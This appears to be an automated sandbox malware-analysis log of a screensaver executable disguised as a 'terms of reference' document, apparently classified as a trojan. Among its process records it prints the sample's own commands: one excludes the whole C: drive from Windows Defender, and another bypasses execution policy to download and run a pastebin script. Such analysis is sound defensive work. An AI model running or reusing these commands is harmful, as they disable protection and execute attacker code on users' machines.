Source: powershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.2187986324.000001F767229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 59790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59791 -> 443
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F1EB7D NtWriteVirtualMemory,4_2_00007FF848F1EB7D
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeCode function: 0_2_00007FF6483B306F0_2_00007FF6483B306F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF30E92_2_00007FF848FF30E9
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Terms_of_reference_06_01_2025_samsung.scr.exeBinary or memory string: OriginalFilename vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159289915.0000025773940000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159050978.0000025772122000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWorkTeam.dll2 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWorkTeam.dll2 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160623783.0000029808800000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167883026.000002980C490000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159264890.0000025773931000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167851335.000002980C481000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159195195.0000025773911000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165863155.000002980BB21000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166308984.000002980BD10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168866320.000002980D111000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3158687208.0000025771EE1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Terms_of_reference_06_01_2025_samsung.scr.exe
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@14/17@5/5
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeFile created: C:\Users\user\AppData\Roaming\notification_sent.flagJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qaqmihi.pjk.ps1Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Terms_of_reference_06_01_2025_samsung.scr.exeReversingLabs: Detection: 59%
Source: Terms_of_reference_06_01_2025_samsung.scr.exeVirustotal: Detection: 55%
Source: Terms_of_reference_06_01_2025_samsung.scr.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: unknownProcess created: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe"
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: apphelp.dllJump to behavior
